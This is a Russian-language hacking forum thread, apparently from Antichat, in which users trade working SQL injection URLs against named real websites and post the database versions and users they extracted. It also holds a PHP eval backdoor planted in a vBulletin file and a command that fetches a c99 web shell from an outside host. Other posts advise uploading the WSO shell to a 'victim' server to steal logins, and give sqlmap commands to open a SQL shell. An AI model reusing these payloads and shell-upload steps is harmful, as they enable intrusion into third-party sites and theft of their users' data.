http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74%27+or%201%20group%20by%20concat%28user%28 %29,floor%28rand%280%29*2%29%29%20having%20min%280 %29%20or%201+--+

Duplicate entry 'asanbiotech_e@localhost1' for key 1

FunOfGun said:
Заарнее благодарен


http://www.timesworld24.com/cat-news-details.php?id=1

Инъекция в числовом параметре

Определим количество столбцов (смотрим низ страницы)

http://www.timesworld24.com/cat-news-details.php?id=1+group+by+7+--+#.UR8NhG-rEhH TRUE

http://www.timesworld24.com/cat-news-details.php?id=1+group+by+8+--+#.UR8NhG-rEhH FALSE

Обходим WAF

http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,2,3,4,5,6,7)+--+

Добиваемся вывода

http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,concat_ws(0x3a,ver sion(),user()),3,4,5,6,7)+--+#.UR8NQW-rEhH

5.5.23-55:timeswor_n2031t2@localhost

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1='1

Инъекция в строковом параметре

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+25+--+ TRUE

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+26+--+ FALSE

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,'25#+--+

Данные передаются в UPDATE запрос, а значит финт ушами не прокатит.

Остаётся BLIND

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=if(substring((@@version),1,1)=4,1, 2)+--+

Ну или более привычный вам

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+substring((@@version),1,1)=4+--+

Есть возможность крутить как Error-Based, но её уже предложили выше.

http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27

Инъекция в числовом параметре

Добиваемся вывода

http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27+and+1=2+union+select+1,unhex(hex(@@version)) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Вобщем суть такая. Есть форма активации одной софтинки. Софтинка при установке привязывается к железу. В форму вводишь ключ который получился от привязки (по типу 45F7EF0456A88B0536633746C986 )

И ключ оплаты который получил на сайте, после оплаты.

Вот собственно форма Активации: _http://worldbik.ru/act.php

В ней два поля. Ковычки и т.п. Фильтруется, однако если в верхнее поле (код оплаты) ввести русские буквы ( в нижнее поле нужно ввести что угодно, чтобы не было пустым.) то вылазит ошибка Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/muwik/worldbik.ru/act.php on line 76

Можно ли как нибудь этим воспользоваться, или кроме раскрытия путей это ничего не даст?

Подскажите, можно отсюда что-нибудь вытащить? Или в каком направлении двигаться?

http://site.ru/index.php?area=viewSale&id=31

class: PostgresDatabaseException

code: 42P01

message: ERROR: 42P01: relation "sale" does not exist - SELECT "sale"."id", "sale"."category_id", "sale"."title", "sale"."created", "sale"."announce", "sale"."content", "sale"."project_id" FROM "sale" WHERE ("sale"."id" = '31')

#0 /var/www/onphp-framework/core/DB/DB.class.php(321): PgSQL->queryRaw('SELECT "sale"."...')

#1 /var/www/onphp-framework/core/DB/PgSQL.class.php(126): DB->query(Object(SelectQuery))

#2 /var/www/onphp-framework/main/DAOs/Workers/BaseDaoWorker.class.php(152): PgSQL->queryRow(Object(SelectQuery))

#3 /var/www/onphp-framework/main/DAOs/Workers/CommonDaoWorker.class.php(53): BaseDaoWorker->cachedFetchObject(Object(SelectQuery), 604800, true)

#4 /var/www/onphp-framework/main/DAOs/Workers/TransparentDaoWorker.class.php(29): CommonDaoWorker->getById(31, 604800)

#5 /var/www/onphp-framework/main/DAOs/GenericDAO.class.php(165): TransparentDaoWorker->getById(31, 3600)

#6 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(144): GenericDAO->getById(31)

#7 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(118): PrimitiveIdentifier->actualImportValue(31)

#8 /var/www/onphp-framework/core/Form/Form.class.php(422): PrimitiveIdentifier->import(Array)

#9 /var/www/onphp-framework/core/Form/Form.class.php(299): Form->importPrimitive(Array, Object(PrimitiveIntegerIdentifier))

#10 /var/www/site.ru/friends/newAwards-msk/user/controllers/viewNews.class.php(22): Form->import(Array)

#11 /var/www/site.ru/library/classes/Flow/PosterSessionFilter.class.php(66): viewNews->handleRequest(Object(HttpRequest))

#12 /var/www/site.ru/friends/newAwards-msk/classes/Flow/ProjectFilter.class.php(29): PosterSessionFilter->handleRequest(Object(HttpRequest))

#13 /var/www/site.ru/friends/newAwards-msk/user/htdocs/index.php(56): ProjectFilter->handleRequest(Object(HttpRequest))

#14 {main}

при запросе

?area=viewSale&id=31'+or+"sale"."id" = '31 или

?area=viewSale&id=31'+or+id = '31 отправляет на главную страницу

Судя по всему - это PostgreSQL.

А значит и инъектировать надо с особенностями этого SQL языка.

http://bilet.aero/news/event?id=4'

плиз...

Always said:
http://bilet.aero/news/event?id=4'
плиз...




Code:
http://bilet.aero/news/event?id=4)or(1)group+by(mid(version(),rand(0)|0)) having(avg(0))and(1)--+-

Duplicate entry '5.0.51a-24+lenny2'

Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php

dynda2000 said:
Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php


Да, посмотреть вывод команды phpinfo()

Трям.

Как можно с помощью js скрипта подгрузить шелл ?

тобишь я могу в корень сайта влепить код типа:

пхп коды не обрабатываются

Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete

if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

Phpinfo(); выводится.

Пробую вот так:


Code:
faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy'));


И ничего. Что я не так делаю?

Возник другой вопрос.


Code:
system("wget -O customavatars/sss.php http://c99.gen.tr/c99.txt");

Делаю вот так, папка кастом аватарс доступна под запись. Сайт бесконечно грузит этот запрос. Отображаю файлы из каталога:


Code:
system("cd customavatars;ls -al");

Файл создается, но создается он странно:


Code:
-rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php

и при попытке чтения вылетает Internal Server Error

Опять таки, что я делаю не так?

Boombilka said:
Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
Phpinfo(); выводится.
Пробую вот так:

Code:
faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy'));

И ничего. Что я не так делаю?


Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt));

При этом у шелла надо убрать вначале


Файл создается, но создается он странно:
Код:
-rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php
и при попытке чтения вылетает Internal Server Error
Опять таки, что я делаю не так?


Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess

BigBear said:
Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt));
При этом у шелла надо убрать вначале
Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess


Я убирал , лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?

Boombilka said:
Я убирал , лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?


просто загрузи пустой .htaccess

Fldr said:
просто загрузи пустой .htaccess


через что? У меня же нету прав на загрузку, разве нет?

Файл создается, но создается он странно:


если файл создается , так прав на папке хватает

Fldr said:
если файл создается , так прав на папке хватает


да это понятно, но файл то нулевого размера. И .htaccess не могу заменить

Boombilka said:
да это понятно, но файл то нулевого размера. И .htaccess не могу заменить


Ну отправь линк в ПМ. Помучаем вместе.

Существует ли способ обойти trim() при использовании блайнда?

И, вместе с тем, возможно ли использовать


Code:
where id='$_GET['id']' and xxx=....

без применения комментариев?

Помогите разобраться с Blind SQL


Code:
POST /fight_forum/search.php?sd=-1%20or%2091%3d89&search_id=unanswered&sid=50defd8e5ccb6ed213919316b7e044a4&sk=t&sr=topics&st=0 HTTP/1.1
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: site.com
Cookie: cookie
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

sd=a&sk=a&sort=%d0%9f%d0%b5%d1%80%d0%b5%d0%b9%d1%82%d0%b8&st=0

exstreme said:
Помогите разобраться с Blind SQL

Code:
/fight_forum/search.php?sd=-1%20or%2091%3d89&search_id=unanswered&sid=50defd8e5ccb6ed213919316b7e044a4&sk=t&sr=topics&st=0 HTTP/1.1




Тут нет инъекта.

Над тобой девелоперы Акунетикса поглумились, а ты и не заметил...

BigBear said:
Тут нет инъекта.
Над тобой девелоперы Акунетикса поглумились, а ты и не заметил...


Жаль, а можно прояснить, на чем основано ложное срабатывание?

Тем, что Акунетикс своими запросами в 10+ потоков, нагрузил сайт и тот момент когда у него шла проверка на SQL иньекции, сайт чуток призадумался и выдал либо не тот контент (ошибку, например) или долго отвечал, и Акунетикс, любит это понимать, как рабочий вектор и сразу выдает Blind SQL Injection!

cat1vo said:
Тем, что Акунетикс своими запросами в 10+ потоков, нагрузил сайт и тот момент когда у него шла проверка на SQL иньекции, сайт чуток призадумался и выдал либо не тот контент (ошибку, например) или долго отвечал, и Акунетикс, любит это понимать, как рабочий вектор и сразу выдает
Blind SQL Injection
!


Видно так и есть, сделал ретест, опровергло результат. Всем спасибо за помощь.

Друзья помогите нашел инекцию как ее реализовать инъексция в пост запросе

DbException: Query failed:

SELECT `users`.`id`, IF(name != "", name, login) AS `title`, `users`.`city_id`, `users`.`group_id`, `users`.`email`, `users`.`login`, `users`.`password`, `users`.`name`, `users`.`salt`, `users`.`key`, IF(`users_groups`.`god`, "god", IF(`users`.`group_id`=4, "tl", "hr")) AS `access`,`users_groups`.`id` AS `users_groups:id`,`users_groups`.`title` AS `users_groups:title`,`users_groups`.`god` AS `users_groups:god`,`users_groups`.`custom` AS `users_groups:custom`

FROM `skb_users` AS `users`

LEFT JOIN `skb_users_groups` AS `users_groups` ON ((`users`.`group_id` = `users_groups`.`id`) AND (`users_groups`.`_state` = 0))

WHERE `users`.`_state` = 0 AND (`users`.`login` = '\'\"\\\'\\\");|]*`users`.`%0d%0a' AND {realm` = 'cms')

LIMIT 1

в '"\'\");|]*{%0d%0a могу вставить что угодно

сам запрос такой

Content-Disposition: form-data; name="_login"

'"\'\");|]*{%0d%0a

Content-Disposition: form-data; name="_password"

sdsd

что сделать дальше?

Xvir said:
Друзья помогите нашел инекцию как ее реализовать инъексция в пост запросе
DbException: Query failed:
SELECT `users`.`id`, IF(name != "", name, login) AS `title`, `users`.`city_id`, `users`.`group_id`, `users`.`email`, `users`.`login`, `users`.`password`, `users`.`name`, `users`.`salt`, `users`.`key`, IF(`users_groups`.`god`, "god", IF(`users`.`group_id`=4, "tl", "hr")) AS `access`,`users_groups`.`id` AS `users_groups:id`,`users_groups`.`title` AS `users_groups:title`,`users_groups`.`god` AS `users_groups:god`,`users_groups`.`custom` AS `users_groups:custom`
FROM `skb_users` AS `users`
LEFT JOIN `skb_users_groups` AS `users_groups` ON ((`users`.`group_id` = `users_groups`.`id`) AND (`users_groups`.`_state` = 0))
WHERE `users`.`_state` = 0 AND (`users`.`login` = '\'\"\\\'\\\");|]*`users`.`%0d%0a' AND {realm` = 'cms')
LIMIT 1
в '"\'\");|]*{%0d%0a могу вставить что угодно
сам запрос такой
Content-Disposition: form-data; name="_login"
'"\'\");|]*{%0d%0a
Content-Disposition: form-data; name="_password"
sdsd
что сделать дальше?


Может ссыль дашь? а там дальше посмотрим, что можно сделать

winstrool said:
Может ссыль дашь? а там дальше посмотрим, что можно сделать


Блин извени не могу очень важный для меня объект)а так не подскажешь?

Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?

попугай said:
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?


Кодировать запрос? http://urlencode.ru/

Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=

TeslaNik said:
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=


POST|COOKIE|HEADER никто не отменял ведь...

Так что думаю, вполне реально.

BigBear said:
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.


Спасибо буду зубрить=)

Возможно сформировать запрос так чтоб скрипт выдал


Code:
query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";

?

Скрипт pastebin (http://pastebin.com/0W9YU5H0)

Прошу помощи:

На сайте есть скрипт usr.php

следующего содержания:


Code:
get ('usr_'.$id);
if (!$ret)
{
$SQL = sqli::get ();
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
$ret = $x->fetch_assoc ();
$memcache->set ('usr_'.$id, $ret, 0, 300);
}
return $ret;
}

?>

Насколько я понял, скрипт реализует функцию извлечения инфы из базы данных по идентификатору пользователя, но как ему сообщить этот идентификатор?

Моих познаний хватило только на следующее:

site.com/usr.php?id=1

Хотя и понимаю, что это неверно, подскажите, пожалуйста правильный запрос.

Спасибо

$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");

Вот сам запрос...

А вот переменная, которая попадает в запрос...

Она передаётся в функцию напрямую...

function get_Usr ($id)

А уж как и откуда она берётся до функции - куча и куча вариантов...

BigBear said:
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` =
$id
");
Вот сам запрос...


Спасибо, это я понял,


BigBear said:
А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)


Это тоже.


BigBear said:
А уж как и откуда она берётся до функции - куча и куча вариантов...


А вот тут непонятно: Приведенный код - это весь файл ПХП, лежащий в корне сервера, как я понял, переменная в функцию передается напрямую при запросе пхп-скрипта.

Так вот я и не понял, с каким синтаксисом составить запрос, чтобы переменная из него передалась в функцию.

Я только начинаю, поэтому со скрипом въезжаю в некоторые вопросы.

Спасибо

Просканировал сайт программой Acunetix Web Vulnerability Scanner 8

Нашел 24 уязвимости.

Проблема в том, что он дает описание и содержимое этих уязвимостей, НО не дает прямую ссылку на неё.

Показывать сайт не буду из-за религиозных соображений.

Кто реально готов помочь, могу скинуть сохраненный файл от сканированного сайта.

------------

вот одна из них:


SQL injection (verified)
This vulnerability affects
/servers
.
Discovered by: Scripting (Sql_Injection.script).
Attack details
Cookie input
pass
was set to
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(7 3),CHAR(55),CHAR(87),CHAR(111),CHAR(67),CHAR(71),C HAR(99)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
Injected pattern found:
4Cu2I7WoCGc
------------
Request
GET /servers HTTP/1.1
Cookie: login=demodemo; pass=%22and%28select 1 from%28select count%28%2A%29%2Cconcat%28%28select concat%28CHAR%2852%29%2CCHAR%2867%29%2CCHAR%28117% 29%2CCHAR%2850%29%2CCHAR%2873%29%2CCHAR%2855%29%2C CHAR%2887%29%2CCHAR%28111%29%2CCHAR%2867%29%2CCHAR %2871%29%2CCHAR%2899%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x from information_schema.tables group by x%29a%29and%22
Host: game.сайт.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
--------------
http://cs421621.vk.me/v421621376/4a06/i_0wBDU7Nkc.jpg

panfilov1991, ссылка у тя http://твой_сайт.***/server

а скуль в куках. Лог то смотри

погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)

Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).

Нашел следующий скрипт sql.php:


Code:


Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?

Спасибо

zloy_fantom, только если есть шел на уязвимой машине

Кто может подсказать по xss. Напишите пожалуйста в личку.

Melfis said:
panfilov1991
, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри


В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!

panfilov1991

В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?

zloy_fantom

Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!

panfilov1991 said:
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!


Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта

экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.

cat1vo said:
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!




помогите


Пожалуйста

OxoTnik said:
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.


Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.

Все отлично работает, запрос переделал, мне так удобнее...


Code:
Host: game.parlahost.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version() ,schema())),rand(0)|0))having(avg(0))or"

Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'

Версия - 5.5.29-1-log

Названия Базы Данных - s10parl

"or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"

Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА (https://antichat.live/threads/43966/)

З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!

WendM said:
zloy_fantom
, только если есть шел на уязвимой машине


А если такой вариант:

На той-же машине, что и сервер, развернут сервер openvpn, ко внутренней сети которого я подключился как клиент. На паре машин этой сети открыты порты snmp, mysql и ssh. snmp видна просто как расшаренные папки, но в них ничего интересного. По ssh подключение доступно через putty, знать-бы пароль root... А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?

Спасибо


cat1vo said:
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!


Зарегистрировался, а вот как посмотреть, какие данные для доступа к БД они предоставляют, не понял. Зайти под теми данными попробую (дождусь только, когда админ разлогинится), только что мне это даст? Я ведь все равно не смогу шелл загрузить...Или смогу? Короче, надо пробовать, может будет доступна панель управления или редактирования....

Спасибо

zloy_fantom said:
А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?


Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...

winstrool said:
Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...


Не получается: wso положил в расшаренную папку внутренней сети, но каков путь к ней в подсистеме сервера, я не знаю, т.е., через интерпретатор PHP wso не достать

Срочно! Нужна помощь с заливкой шелла!

Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((

Кто может почь, пишите сюда или в ЛС.

Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.

GhostW said:
Срочно! Нужна помощь с заливкой шелла!
Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((
Кто может почь, пишите сюда или в ЛС.
Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.


Ну когда же вы научитесь самостоятельно искать инфу?! ладно...

заходим в раздел

Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости

Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд и внимательно изучаете в ней нужные вам аспекты!

а точнее ткну пальцем!

статьи по PHP инклудам:

php injection (https://antichat.live/threads/12123/)

Автор GreenBear

TRUE PHP-injection (https://antichat.live/threads/23501/)

Автор Zadoxlik

PHP-include и способы защиты (https://antichat.live/threads/91807/)

Автор _Pantera_

[новый способ] замена нулл-байту в инклудах (https://antichat.live/threads/98525/)

Автор [Raz0r]

Логи и конфиги:

Default *log, *conf files locations (https://antichat.live/threads/49775/)

respect ettee

phpinfo

здрасте

уменя естъ phpinfo() от крупного сайта...

только спомощю phpinfo() я смогу етот сайт ломатъ?

и как?

можте кто нибудъ нопомч мне?

FuckGoogle said:
здрасте
уменя естъ phpinfo() от крупного сайта...
только спомощю phpinfo() я смогу етот сайт ломатъ?
и как?
можте кто нибудъ нопомч мне?


Нет не сможите!, phpinfo() выводи инфу о настройках апача и мелкой тароблы не болие того!

Возможно сформировать запрос так чтоб скрипт выдал


Code:
query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";

?


PHP:
require_once('../../../wp-config.php');

require_once('../../../wp-includes/functions.php');



// CSRF attack protection. Check the Referal field to be the same

// domain of the script



$k_id=strip_tags($wpdb->escape($_GET['id']));

$k_action=strip_tags($wpdb->escape($_GET['action']));

$k_path=strip_tags($wpdb->escape($_GET['path']));

$k_imgIndex=strip_tags($wpdb->escape($_GET['imgIndex']));



// prevent SQL injection

if (!is_numeric($k_id)) die('error|Query error' );



$table_name=$wpdb->prefix.'comment_rating';

$comment_table_name=$wpdb->prefix.'comments';



if($k_id&&$k_action&&$k_path) {

//Check to see if the comment id exists and� �grab the rating

$query="SELECT * FROM `$table_name` WHERE ck_comment_ id =$k_id";

$result=mysql_query($query);



if(!$result) { die('error|mysql: '.mysql_error()); }



if(mysql_num_rows($result))

{

$duplicated=0;// used as a counter to off set duplicated votes

if($row= @mysql_fetch_assoc($result))

{

// Handle proxy with original IP address

$ip=getenv("HTTP_X_FORWARDED_FOR") ?getenv("HTTP_X_FORWARDED_FOR") :getenv("REMOTE_ADDR");

if(strstr($row['ck_ips'],$ip)) {

// die('error|You have already voted on this item!');

// Just don't count duplicated votes

$duplicated=1;

$ck_ips=$row['ck_ips'];

}

else {

$ck_ips=$row['ck_ips'] .','.$ip;// IPs are separated by ','

}

}



$total=$row['ck_rating_up'] -$row['ck_rating_down'];

if($k_action=='add') {

$rating=$row['ck_rating_up'] +1-$duplicated;

$direction='up';

$total=$total+1-$duplicated;

}

elseif($k_action=='subtract')

{

$rating=$row['ck_rating_down'] +1-$duplicated;

$direction='down';

$total=$total-1+$duplicated;

} else {

die('error|Try again lat er');//No action given.

}



if (!$duplicated)

{

$query="UPDATE `$table_name` SET ck_rating_$direction=� �'$rating', ck_ips = '".$ck_ips."' WHERE ck_comment_id =$k_id";

$result=mysql_query($query);

if(!$result)

{

// die('error|query '.$query);

die('error|Query error');

}



// Now duplicated votes will not

if(!mysql_affected_rows())

{

die('error|affected '.$ra ting);

}



$karma_modified=0;

if (get_option('ckrating_karma_ type') =='likes'&&$k_action=='add') {

$karma_modified=1;$karma=$rating;

}

if (get_option('ckrating_karma_ type') =='dislikes'&&$k_action=='subtract') {

$karma_modified=1;$karma=$rating;

}

if (get_option('ckrating_karma_ type') =='both') {

$karma_modified=1;$karma=$total;

}



if ($karma_modified) {

$query="UPDATE `$comment_table_name` SET comment_karma� �= '$karma' WHERE comment_ID =$k_id";

$result=mysql_query($query);

if(!$result) die('error|C omment Query error');

}



// Invalidate the W3 cache by triggering the� �global wordpress action hook for an edited� �comment

do_action("edit_comment",$k_id);

}

} else {

die('error|Comment doesnt exist' );//Comment id not found in db, something wrong ?

}

} else {

die('error|Fatal: html format error');

}



// Add the + sign,

if ($total>0) {$total="+$total"; }



//This sends the data back to the js to pro cess and show on the page

// The dummy field will separate out any pot ential garbage that

// WP-superCache may attached to the end of the return.

echo("done|$k_id|$rating|$k_path|$direction|$total|$k_im gIndex|dummy");

?>

И снова всем привет!

Вот у меня возникла такая проблемка, есть сайт с форумом IPB 2.3.5 на сайте есть sql-injection, довольно быстро получил доступ к БД и сразу же начал дампить данные юзеров форума. И тут получился весь облом. Вся соль в том что есть колонка name, email и т.п. а вот password - нету. Вопрос: где админ мог скрыть пароли юзеров и как?

Кто может подробнее обьяснить как компилить запускать exploit?Где качать pyton и т.д.Буду очень благодарен.Есть большое количество шелов.Хотелось бы попробовать получить root.

Нашел следующие уязвимости в скриптах:

Торрент-трекеры основанные на TBDev 2.0 YSE

1.

Уязвимость позволяет удалённому пользователю сформировать спец. атакующий url адрес и тем самым выполнять произвольный SQL запрос.

./announce.php


Code:
$snatch_updateset[] = "completedat = $dt";
$snatch_updateset[] = "uploaded = uploaded + $uploaded2";
$snatch_updateset[] = "downloaded = downloaded + $downloaded2";
$snatch_updateset[] = "to_go = $left";
$snatch_updateset[] = "port = $port";
$snatch_updateset[] = "last_action = $dt";

2.

Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.

Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.

Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.

./bonuscode.php


Code:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");

3.

Не достаточная фильтрация входящих данных дает возможность совершить атаки на файлы rss.php, announce.php, takesignup.php b на другие файлы где используется функция sqlesc(). Это связано с тем что функция sqlesc() экранирует только параметры string. Если же входящие параметры были распознаны как numeric то они не экранируются.

./include/functions.php


Code:
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}

./include/functions_announce.php


Code:
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}

Подскажите, как их можно использовать?

А может кто знает еще типичные уязвимости этого релиза?

Спасибо

Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.

zloy_fantom said:
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");


в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell

в POST параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell

в Cookie параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell

в Referer:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell

в User-Agent:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell

в любом добавочном хидере:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell

и т.д.

\/IRUS

Большое спасибо, буду пробовать

ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut

http://www.pixheaven.net/bestof.php?begin=276&entout=12'

ili

http://www.pixheaven.net/photo.php?nom=120906_9930-46'

borntobebad said:
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'


что-то я тоже не могу вдуплить

